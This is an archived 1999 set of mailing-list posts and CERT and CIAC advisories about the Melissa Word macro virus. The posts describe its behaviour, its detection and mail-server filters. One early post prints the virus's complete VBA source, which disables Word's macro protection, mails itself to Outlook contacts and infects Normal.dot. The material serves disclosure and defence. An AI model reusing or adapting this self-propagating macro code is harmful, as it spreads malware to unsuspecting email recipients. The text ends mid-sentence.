Date: Fri, 26 Mar 1999 17:05:51 -0800 From: Aleph One To: BUGTRAQ@netspace.org Subject: Melissa Macro Virus I normally don't allow virus posts through the list as they seldom represent a new threat, just a new example of an already existing one, but this one is getting enough play to warrant a message. There is a new Word macro virus circulating called Melissa. The virus propagates via email. Attached to the email is a Word file that when opened will launch a macro that will send the same message to the first 50 recipients of your Outlook address book. The subject line is "important Message From ". The body consist of the text "Here is that document you asked for... don't show anyone else;-)". The infected documents contains passwords to porn web sites. For more information check out: http://vil.mcafee.com/vil/vm10120.asp As this thing is emailing itself to everyone under the sun virus vendors should have no problem obtaining copies to analyze. If anyone wants a copy send me a message. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 ---------------------------------------------------------------------------- Date: Fri, 26 Mar 1999 18:01:13 -0800 From: Nate Lawson To: BUGTRAQ@netspace.org Subject: Melissa virus code Sorry to add one more message to this. I placed the code up on my site, formatted so that it is readable. http://www.root.org/ -Nate [http://www.root.org/melissa_virus.txt] Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True End If 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub ---------------------------------------------------------------------------- Date: Fri, 26 Mar 1999 17:51:49 -0800 From: Nate Lawson To: BUGTRAQ@netspace.org Subject: Re: Melissa Macro Virus Here is my analysis of how the virus works. The McAfee article aleph1 posted neglects to mention that it infects the active document and Normal.dot 1. Check for Word security controls and disable them: Word 2000 Macro.Security... = FALSE Word 97 Options.ConfirmConversions = 0 Options.VirusProtection = 0 Options.SaveNormalPrompt = 0 2. See if machine is already infected Check HKCU\Software\Microsoft\Office\Melissa? for the string "... by Kwyjibo" 3. If it wasn't already infected, go through the Outlook addressbook and send mail to the first 50 names Subject: Important Message From Body: Here is that document you asked for... don't show anyone else ;-) Attachment: itself, named "list.doc" After sending the mail, add the registry key to disable further infection. 4. Open the Active Document and Normal.dot and infect them with itself 5. On the way out, check if the current day equals the current minute. If so, print "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." It does not appear to do anything malicious other than shutting down your mail server with tons of mail as users start opening the attachment. It appears the virus vendors have a patch out now. To avoid infection, disable macros when opening any Word document or just don't open the attachment. Thanks to Josh Siegel for sending me the code. -Nate ---------------------------------------------------------------------------- Date: Fri, 26 Mar 1999 19:00:35 -0800 From: "Kuo, Jimmy" To: BUGTRAQ@netspace.org Subject: Re: Melissa Macro Virus Nate Lawson does a wonderful writeup to which I will make minor clarifications: >Here is my analysis of how the virus works. The McAfee article aleph1 >posted neglects to mention that it infects the active document and >Normal.dot [Hide face] In all the clamor over the spreading aspect, we forgot to tell people that it's a normal macro virus in all other means. And that if you don't have Outlook, breath calm. But if you do have Outlook, WATCH OUT! "infects the active document" is redundant. It's infected. That's what starts this. >1. Check for Word security controls and disable them: > Word 2000 > Macro.Security... = FALSE > Word 97 > Options.ConfirmConversions = 0 > Options.VirusProtection = 0 > Options.SaveNormalPrompt = 0 >2. See if machine is already infected > Check HKCU\Software\Microsoft\Office\Melissa? for the string "... by >Kwyjibo" >3. If it wasn't already infected, go through the Outlook addressbook and >send mail to the first 50 names First 50 names of every addressbook. And the kicker? Look at the first 50 names in your address books? How many mailing lists are there? > Subject: Important Message From > Body: Here is that document you asked for... don't show anyone else >;-) > Attachment: itself, named "list.doc" This time. We have discovered that it was posted to alt.sex in a file named LIST.ZIP. > After sending the mail, add the registry key to disable further >infection. Disables future mailings. Infections can happen again. But the email blast will happen only the first time, unless you clean the registry. So we recommend that you do not remove that element of the registry. >4. Open the Active Document and Normal.dot and infect them with itself >5. On the way out, check if the current day equals the current minute. >If so, print "Twenty-two points, plus triple-word-score, plus fifty points >for using all my letters. Game's over. I'm outta here." >It does not appear to do anything malicious other than shutting down your >mail server with tons of mail as users start opening the attachment. It >appears the virus vendors have a patch out now. To avoid infection, >disable macros when opening any Word document or just don't open the >attachment. Thanks to Josh Siegel for sending me the code. Good ideas. Jimmy Kuo Director, AV Research, Network Associates (or as he says, McAfee) jkuo@nai.com ---------------------------------------------------------------------------- Date: Fri, 26 Mar 1999 19:24:47 -0800 From: Aaron Wood To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: [BugTraq] Melissa Macro Virus (fwd) On a lighter side... MSNBC speculates as to the origin of the Hackers name. "Kwyjibo appears to be a reference to a "Simpsons" TV show episode in which Bart Simpson wins a Scrabble game by spelling out the word Kwyjibo. The virus also includes a line from that episode: "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." AW -----Original Message----- >From: Dan Schrader [mailto:Dan_Schrader@trendmicro.com] Sent: Friday, March 26, 1999 6:56 PM To: 'Aaron Wood'; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: RE: [BugTraq] Melissa Macro Virus (fwd) This is a serious event. A number of major companies - including Microsoft and Intel have told the press that they had to temporarily shut down their e-mail systems due to this virus. At least 25 major companies have contacted Trend Micro about this today alone. Trend Micro has a free tool for scanning your exchange servers to ensure that they are not harboring any infected documents. The tool, called HouseCall for Microsoft Exchange is available at: http://housecall.antivirus.com/smex_housecall/ This detects, but does not cure infected files. HouseCall for Exchange is an ActiveX Control - so you need Microsoft IE with security settings set to medium or low to run it. Considering this audience, I suspect you will want to remember to set those settings back when you are done. Trend also offers a tool for scanning individual machines http://housecall.antivirus.com Virus Description: This virus works with both Word 97 and Word 2000 and the macro activates when an infected document is closed. If it is activated in Word 2000, it will lower the security setting to the lowest level by modifying the registry and will disable the Word menu commands (Macro\Security) which allows the user to reinstate security settings. In Word97, the virus disables the Tools/Macro menu commands, the Confirm Conversions option, the MS Word macro virus protection, and the Save Normal Template prompt. The virus then checks to see if the registry key "HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?" contains the value ". . . by Kwyjibo." This is how the virus determines whether it has activated on this system. The virus then opens Outlook, if present on the system, and sends one email for each address list. The email may contain up to 50 recipients. The email will contain the subject line: "Important Message From {user name}" and the message body will be "Here is that document you asked for . . . don't show anyone else :-)" The virus then attaches a copy of the infected active document to the outgoing mail. The name of the original infected attachment was List.doc, but it could be any name. If the user does not have Outlook, the virus will not work. Then the virus modifies the value of the registry key mentioned above so it is equal to ". . . by Kwijibo" -- indicating that it has successfully activated on this computer. After that, the virus checks to see if the normal template and active document are infected, and if either is not, it infects the file. Finally, if the day of the month is equal to the minute (for example, if it is March 26 at 3:26 pm), the virus will type the following text on the active document: "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." Trend Micro has detection for this virus in its latest pattern update, "510". Users are encouraged to download and install this latest pattern update. The protection will also be included in the regular weekly update. ---------------------------------------------------------------------------- Date: Sat, 27 Mar 1999 07:07:20 -0500 From: CERT Advisory Reply-To: cert-advisory-request@cert.org To: cert-advisory@coal.cert.org Subject: CERT Advisory CA-99.04 - Melissa Macro Virus -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-99-04-Melissa-Macro-Virus Original issue date: Saturday March 27 1999 Last Revised: Saturday March 27, 1999 Systems Affected * Machines with Microsoft Word 97 or Word 2000 * Any mail handling system could experience performance problems or a denial of service as a result of the propagation of this macro virus. Overview At approximately 2:00 PM GMT-5 on Friday March 26 1999 we began receiving reports of a Microsoft Word 97 and Word 2000 macro virus which is propagating via email attachments. The number and variety of reports we have received indicate that this is a widespread attack affecting a variety of sites. Our analysis of this macro virus indicates that human action (in the form of a user opening an infected Word document) is required for this virus to propagate. It is possible that under some mailer configurations, a user might automatically open an infected document received in the form of an email attachment. This macro virus is not known to exploit any new vulnerabilities. While the primary transport mechanism of this virus is via email, any way of transferring files can also propagate the virus. Anti-virus software vendors have called this macro virus the Melissa macro or W97M_Melissa virus. I. Description The Melissa macro virus propagates in the form of an email message containing an infected Word document as an attachment. The transport message has most frequently been reported to contain the following Subject header Subject: Important Message From Where is the full name of the user sending the message. The body of the message is a multipart MIME message containing two sections. The first section of the message (Content-Type: text/plain) contains the following text. Here is that document you asked for ... don't show anyone else ;-) The next section (Content-Type: application/msword) was initially reported to be a document called "list.doc". This document contains references to pornographic web sites. As this macro virus spreads we are likely to see documents with other names. In fact, under certain conditions the virus may generate attachments with documents created by the victim. When a user opens an infected .doc file with Microsoft Word97 or Word2000, the macro virus is immediately executed if macros are enabled. Upon execution, the virus first lowers the macro security settings to permit all macros to run when documents are opened in the future. Therefore, the user will not be notified when the virus is executed in the future. The macro then checks to see if the registry key "HKEY_Current_User\Software\Microsoft\Office\Melissa?" has a value of "... by Kwyjibo". If that registry key does not exist or does not have a value of "... by Kwyjibo", the virus proceeds to propagate itself by sending an email message in the format described above to the first 50 entries in every MAPI address book readable by the user executing the macro. Keep in mind that if any of these email addresses are mailing lists, the message will be delivered to everyone on the mailing lists. In order to successfully propagate, the affected machine must have Microsoft Outlook installed; however, Outlook does not need to be the mailer used to read the message. Next, the macro virus sets the value of the registry key to "... by Kwyjibo". Setting this registry key causes the virus to only propagate once per session. If the registry key does not persist through sessions, the virus will propagate as described above once per every session when a user opens an infected document. If the registry key persists through sessions, the virus will no longer attempt to propagate even if the affected user opens an infected document. The macro then infects the Normal.dot template file. By default, all Word documents utilize the Normal.dot template; thus, any newly created Word document will be infected. Because unpatched versions of Word97 may trust macros in templates the virus may execute without warning. For more information please see: http://www.microsoft.com/security/bulletins/ms99-002.asp Finally, if the minute of the hour matches the day of the month at this point, the macro inserts into the current document the message "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." Note that if you open an infected document with macros disabled and look at the list of macros in this document, neither Word97 nor Word2000 list the macro. The code is actually VBA (Visual Basic for Applications) code associated with the "document.open" method. You can see the code by going into the Visual Basic editor. If you receive one of these messages, keep in mind that the message came from someone who is affected by this virus and they are not necessarily targeting you. We encourage you to contact any users from which you have received such a message. Also, we are interested in understanding the scope of this activity; therefore, we would appreciate if you would report any instance of this activity to us according to our Incident Reporting Guidelines document available at: http://www.cert.org/tech_tips/incident_reporting.html II. Impact * Users who open an infected document in Word97 or Word2000 with macros enabled will infect the Normal.dot template causing any documents referencing this template to be infected with this macro virus. If the infected document is opened by another user, the document, including the macro virus, will propagate. Note that this could cause the user's document to be propagated instead of the original document, and thereby leak sensitive information. * Indirectly, this virus could cause a denial of service on mail servers. Many large sites have reported performance problems with their mail servers as a result of the propagation of this virus. III. Solutions * Block messages with the signature of this virus at your mail transfer agents. With Sendmail Nick Christenson of sendmail.com provided information about configuring sendmail to filter out messages that may contain the Melissa virus. This information is available from the follow URL: ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-m elissa-filter.txt * Utilize virus scanners Most virus scanning tools will detect and clean macro viruses. In order to detect and clean current viruses you must keep your scanning tools up to date with the latest definition files. + McAfee / Network Associates http://vil.mcafee.com/vil/vm10120.asp http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp + Symantec http://www.symantec.com/avcenter/venc/data/mailissa.html + Trend Micro http://housecall.antivirus.com/smex_housecall/technotes.html * Encourage users at your site to disable macros in Microsoft Word Notify all of your users of the problem and encourage them to disable macros in Word. You may also wish to encourage users to disable macros in any product that contains a macro language as this sort of problem is not limited to Microsoft Word. In Word97 you can disable automatic macro execution (click Tools/Options/General then turn on the 'Macro virus protection' checkbox). In Word2000 macro execution is controlled by a security level variable similar to Internet Explorer (click on Tools/Macro/Security and choose High, Medium, or Low). In that case, 'High' silently ignores the VBA code, Medium prompts in the way Word97 does to let you enable or disable the VBA code, and 'Low' just runs it. Word2000 supports Authenticode on the VB code. In the 'High' setting you can specify sites that you trust and code from those sites will run. * General protection from Word Macro Viruses For information about macro viruses in general, we encourage you to review the document "Free Macro AntiVirus Techniques" by Chengi Jimmy Kuo which is available at. http://www.nai.com/services/support/vr/free.asp Acknowledgements We would like to thank Jimmy Kuo of Network Associates, Eric Allman and Nick Christenson of sendmail.com, Dan Schrader of Trend Micro, and Jason Garms and Karan Khanna of Microsoft for providing information used in this advisory. Additionally we would like to thank the many sites who reported this activity. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html. ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key. If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/. To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message. Copyright 1999 Carnegie Mellon University. Conditions for use, disclaimers, and sponsorship information can be found in http://www.cert.org/legal_stuff.html. * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. ______________________________________________________________________ Revision History -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBNvy9H3VP+x0t4w7BAQG1ggP7B8ItzTRpkP2O8JK7olIOdmn072PIZZxE mJDW+A9fLDvRZQlVDSsFz/aH8ivmhor5ZbvtT14OmfIZWvxYdFnbO/s2WYL7+fV5 jL6mSb4AJ6lRXIYii+t22V0lvqJdP6VRFqy9EibpMtU2dhgFYf3TKX5e6wajOmBx bZ6Ef5jPilA= =aABH -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- Date: Fri, 26 Mar 1999 20:20:13 -0800 From: Jim Reavis To: BUGTRAQ@netspace.org Subject: Re: Melissa Macro Virus The one thing I would like to add is that the virus code actually walks through every available address list and grabs 50 recipients off of each for a separate message, so if your Outlook client is attached to an Exchange Server, it will hit the Global Address List and other available containers, where it may find large distribution lists. I will shortly have my analysis up at http://securityportal.com/ Jim Reavis SecurityPortal.com - The focal point for security on the Net jreavis@SecurityPortal.com ---------------------------------------------------------------------------- Date: Sat, 27 Mar 1999 12:45:38 -0800 (PST) From: CIAC Mail User To: ciac-bulletin@rumpole.llnl.gov Subject: CIAC Bulletin J-037: W97M.Melissa Word Macro Virus [ For Public Release ] -----BEGIN PGP SIGNED MESSAGE----- __________________________________________________________ The U.S. Department of Energy Computer Incident Advisory Capability ___ __ __ _ ___ / | /_\ / \___ __|__ / \ \___ __________________________________________________________ INFORMATION BULLETIN W97M.Melissa Word Macro Virus March 27, 1999 17:00 GMT Number J-037 _____________________________________________________________________________ PROBLEM: A new Word 97 macro virus named W97M.Malissa has been detected at multiple DOE sites and is known to be spreading widely. The virus uses Microsoft Outlook to e-mail the infected document to the first 50 people from each of your Outlook address books. PLATFORM: Windows 95 or Windows NT running Microsoft Word 97 (version 8) or Word 2000 (version 9) and Microsoft Outlook. Word 98 on the Macintosh is probably not vulnerable because the virus uses the Windows registry, but that has not been verified yet. Outlook Express and other mail readers are not vulnerable. DAMAGE: It overwrites the first macro in open documents and in the normal.dot template with the macro virus code. It turns off macro detection in Word. It sends copies of the infected document to up to 50 people from each of your Outlook address books. SOLUTION: Use an updated antivirus product. Some vendors have a solution available but in many cases you must go to the vendors web site to get it. Do not depend on the automatic or live update feature of an antivirus package to get the detector for this virus. Additional precautions are to password protect the normal.dot file, turn on macro virus detection in Word, and DO NOT OPEN attachments to mail messages with the subject "Important Message From " and the contents "Here is that document you asked for ... don't show anyone else ;-)" without checking with the sender. Alert your computer security officers if you receive such messages. _____________________________________________________________________________ VULNERABILITY Risk of infection is high. This virus is spreading widely ASSESSMENT: within and without of the DOE complex. The risk of damage to your system is low because most users do not have macros in files and would be alerted by Word's macro detector. The risk of lostproductivity and lost mail messages is high as mail servers may have to be shut down and purged of infected mail messages. _____________________________________________________________________________ CIAC has critical information about the W97M.Melissa Word Macro Virus The W97M.Malissa Word macro virus has been seen within the DOE complex. This macro virus attaches to Word objects in Word 97 and Word 2000. Because of this method of infection, this virus will not infect older versions of Microsoft Word. When an infected document is opened, the virus checks to see if Word 97 or Word 2000 is installed and then disables the Macro toolbar. It then disables the following Word options: Confirm conversions at open. Macro virus protection. Prompt to save Normal template. Disabling these options makes it difficult to detect the virus in action. The virus next checks the value of the private registry string: HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa? If that string is not equal to "... by Kwyjibo" the virus sends copies of the infected document to the first 50 people in each of your Outlook address books and then sets the registry key so it does not do this again. It sends copies of the infected document to others by opening a connection to Microsoft Outlook and creating an e-mail message with the subject: Important Message From where is replaced with the current Word user's name (Tools, Options command, User Information tab). The body of the message contains the following text: Here is that document you asked for ... don't show anyone else ;-) The virus then inserts the first 50 users from your Outlook address book, attaches the infected document and sends the message. It does this for however many address books you have defined in Outlook. After sending itself to the people in your address books, the virus then checks to see if it is running on a document or the Normal.dot template. If it is running on a document, it infects the Normal.dot template with a Document_Close macro that runs whenever a document is closed. If it is running on the Normal.dot template, it infects the active document with a Document_Open macro that runs whenever a document is opened. After the Normal.dot template is infected, the virus infects every document you work on as soon as you close them. If you share these documents with anyone, you will spread the virus. Finally, if the minute of the hour equals the day of the month, the virus inserts the following message at the current location in the active document. Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here. Detecting The Virus =================== Several antivirus vendors have a detection and cleaning capability for this virus; however, you must go to the vendors web site to get the scanner updates. Scanners with automatic or live update features do not yet get the update required to find and clean this virus. While we expect the detection strings to be in the automatic updates in the near future, for the next week or two you should get the scanner directly from your vendor's web site. We have verified that the Norton Antivirus updater obtained from the Symantec web site (http://www.symantec.com/techsupp/custom/mailissa.html) does detect the virus, the current live update does not. We have reliable information that McAfee (http://vil.mcafee.com/vil/vm10120.asp), and Trend Micro (http://housecall.antivirus.com/smex_housecall/technotes.html) also have detection capabilities. If you receive an e-mail with the following subject and body, DO NOT OPEN the attachment. Subject: Important Message From Body: Here is that document you asked for ... don't show anyone else ;-) Make sure the sender is someone you know and then ask them if they really sent you the attachment before opening it. If they did not send it, do not open the attachment and contact your computer security manager. The most common name for the attached file is list1.doc but that name can change. If the following text appears in a document without your putting it there, your normal.dot template is infected and your Word program is infecting all documents when you close them. Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here. Another option to see if a system has been infected is to use Regedit and search for the following registry key: HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa? If that key exists and has the value "... by Kwyjibo" the system has been infected at some time. Note that the infection may have been removed without deleting the key. This key can be deleted, but does no damage if left alone. Protecting A System =================== The first step in protecting a system is to have a current antivirus package running on your system. Be sure to update it at least once a month. Many of the newer antivirus scanners have the capability to automatically update themselves every couple of weeks. To protect Word from this and other Word macro viruses, first insure that Word has been patched with the Word 97 Template vulnerability patch (http://www.microsoft.com/security/bulletins/ms99-002.asp); second, the normal.dot template file should be password protected; and third, the following Word 97 options should be enabled. Confirm conversions at open. Macro virus protection. Prompt to save Normal template. Password Protecting The Normal.dot File - - - - - --------------------------------------- To password protect the Normal.dot file in Word 97, perform these steps: 1. Start Word. 2. Choose the Tools, Macro, Visual Basic Editor command. 3. In the Project window of the Visual Basic Editor, click on Normal. 4. Choose the Tools, Normal Properties command, Protection tab. 5. Check the Lock Project for Viewing check box and type in a password twice. 6. Close the dialog box, close the Visual Basic editor. 7. Quit Word. The next time you start Word, the normal.dot template will be protected. WARNING: If you ever have to type in the password to make changes to the normal.dot file be aware that the file remains unprotected until you quit Word and restart it. Turning On Macro Virus Protection and Other Options - --------------------------------------------------- Some simple macro virus protection is built into Word 97. It does not detect specific macro viruses but only informs you if macros exist on a document you are trying to open. Macros detected by Macro Virus Protection are not necessarily a virus. However, if you are alerted to a macro attached to a document you should be extremely wary because most people do not have macros attached to their documents. Other options to set are: Confirm conversions at open. This makes Word display a dialog box if it is converting a document from one format to another. Prompt to save Normal template. This makes Word display a dialog box asking you to confirm changes to the Normal.dot template. Most macro viruses hide in Normal.dot so this lets you know that there has been a change that you may want to prevent. Changes also occur when you change the default font or one of the built-in styles. To turn on macro virus protection and these other options, perform these steps: 1. Start Word. 2. Choose the Tools, Options command, General tab. 3. Check the Macro Virus Protection check box. 4. Check the Confirm conversions at open check box. 5. Choose the Save tab. 6. Check the Prompt to save Normal template check box. 4. Close the dialog box. Whenever you open a document that contains macros, the macro virus protection opens a dialog box telling you that there are macros in the document and giving you the option to: Open the document with the macros enabled, open the document without the macros, or cancel the open operation. You should only open a document with macros enabled if you are expecting there to be macros on that document and you know what they are supposed to do. Detecting the Virus With a Mail Server ====================================== If a site has been infected you may need to block the virus infected mail messages with your mail servers. The following filter was written by Scott Hutton (Lead Security Engineer, Information Technology Security Office) of Indiana University. As Scott mentions, this filter blocks all messages with the text "Important Message From" in the subject line, which may block messages that do not contain the virus. Use this filter at your own discretion. ===== start included text ====== We blocked this on our mail relays through the following additions to the sendmail.cf: HSubject: $>CheckSubject SCheckSubject RImportant Message From $+ $#error $: 553 Subject Error R$* $@ OK Don't forget that there are tabs before $#error and $@ OK. This will block any message where the subject begins with "Important Message >From ...", which may be too rash of an action at your site. ===== end included text ====== Another filter was obtained by the CERT team from Nick Christenson of sendmail.com ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-melissa- filter.txt _____________________________________________________________________________ Thanks to Scott Hutton for the preliminary analysis and for a sendmail filter. Thanks to CERT and Nick Christenson of sendmail.com for another sendmail filter. _____________________________________________________________________________ CIAC, the Computer Incident Advisory Capability, is the computer security incident response team for the U.S. Department of Energy (DOE) and the emergency backup response team for the National Institutes of Health (NIH). CIAC is located at the Lawrence Livermore National Laboratory in Livermore, California. CIAC is also a founding member of FIRST, the Forum of Incident Response and Security Teams, a global organization established to foster cooperation and coordination among computer security teams worldwide. CIAC services are available to DOE, DOE contractors, and the NIH. CIAC can be contacted at: Voice: +1 925-422-8193 FAX: +1 925-423-8002 STU-III: +1 925-423-2604 E-mail: ciac@llnl.gov For emergencies and off-hour assistance, DOE, DOE contractor sites, and the NIH may contact CIAC 24-hours a day. During off hours (5PM - 8AM PST), call the CIAC voice number 925-422-8193 and leave a message, or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC duty person, and the secondary PIN number, 8550074 is for the CIAC Project Leader. Previous CIAC notices, anti-virus software, and other information are available from the CIAC Computer Security Archive. World Wide Web: http://www.ciac.org/ (or http://ciac.llnl.gov -- they're the same machine) Anonymous FTP: ftp.ciac.org (or ciac.llnl.gov -- they're the same machine) Modem access: +1 (925) 423-4753 (28.8K baud) +1 (925) 423-3331 (28.8K baud) CIAC has several self-subscribing mailing lists for electronic publications: 1. CIAC-BULLETIN for Advisories, highest priority - time critical information and Bulletins, important computer security information; 2. SPI-ANNOUNCE for official news about Security Profile Inspector (SPI) software updates, new features, distribution and availability; 3. SPI-NOTES, for discussion of problems and solutions regarding the use of SPI products. Our mailing lists are managed by a public domain software package called Majordomo, which ignores E-mail header subject lines. To subscribe (add yourself) to one of our mailing lists, send the following request as the E-mail message body, substituting ciac-bulletin, spi-announce OR spi-notes for list-name: E-mail to ciac-listproc@llnl.gov or majordomo@tholia.llnl.gov: subscribe list-name e.g., subscribe ciac-bulletin You will receive an acknowledgment email immediately with a confirmation that you will need to mail back to the addresses above, as per the instructions in the email. This is a partial protection to make sure you are really the one who asked to be signed up for the list in question. If you include the word 'help' in the body of an email to the above address, it will also send back an information file on how to subscribe/unsubscribe, get past issues of CIAC bulletins via email, etc. PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing communities receive CIAC bulletins. If you are not part of these communities, please contact your agency's response team to report incidents. Your agency's team will coordinate with CIAC. The Forum of Incident Response and Security Teams (FIRST) is a world-wide organization. A list of FIRST member organizations and their constituencies can be obtained via WWW at http://www.first.org/. This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes. LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC) J-026: HP-UX rpc.pcnfsd Vulnerability J-027: Digital Unix Vulnerabilities ( at , inc ) J-028: Sun Solaris Vulnerabilities (sdtcm_convert, man/catman, CDE) J-029: Buffer Overflows in Various FTP Servers J-030: Microsoft BackOffice Vulnerability J-031: Debian Linux "Super" package Buffer Overflow J-032: Windows Backdoors Update II: J-034: Cisco 7xx TCP and HTTP Vulnerabilities J-035: Linux Blind TCP Spoofing J-036: LDAP Buffer overflow against Microsoft Directory Services -----BEGIN PGP SIGNATURE----- Version: PGP for Business Security 5.5.2 iQCVAwUBNv07sLnzJzdsy3QZAQEZjwQA6+nHONNAmoosXGsy9eJ6nuIPlFNQ3nM9 +XN1vnqBNI9Hp3kBIXtPXywY4W19NQbyyax6YI+ugmmNfNPEdefeHqnNGuz3dqcW Ce2RQWnPB1dRrUBTorU+cZHsaq+qaX4s2jSNFlJCFeSuUjNYhzVI6HHilhvGZCQI wuSjLbuYabo= =KVaC -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- Date: Sun, 28 Mar 1999 18:12:54 -0500 (EST) From: Greg A. Woods Reply-To: Phil-Sec@datasys.net To: Phil-Sec@datasys.net Subject: RE: Phil-Sec: `Good Times', come to life: Melissa [ On Sunday, March 28, 1999 at 16:49:49 (-0500), ROD VERNEN wrote: ] > Subject: RE: Phil-Sec: `Good Times', come to life: Melissa > > Good points. But WinWord can be configured to require confirmation > before executing a macro. This is an area where user education is > critical... The Melissa "virus" isn't just an ordinary "word processor" macro but rather a Visual 